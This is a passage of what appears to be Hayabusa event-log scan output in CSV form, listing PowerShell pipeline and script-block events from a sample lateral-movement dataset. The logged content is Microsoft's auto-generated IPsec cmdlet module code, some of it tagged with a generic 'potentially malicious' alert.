name=""Function""; value=""New-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.566 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.567 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.567 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.568 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.568 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEMMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() 
Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try 
{ if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { 
[object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 
'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodPa",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEMMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if 
($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { 
[object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodPa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"rameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeCryptoSet' -Alias '*' function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] 
${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] 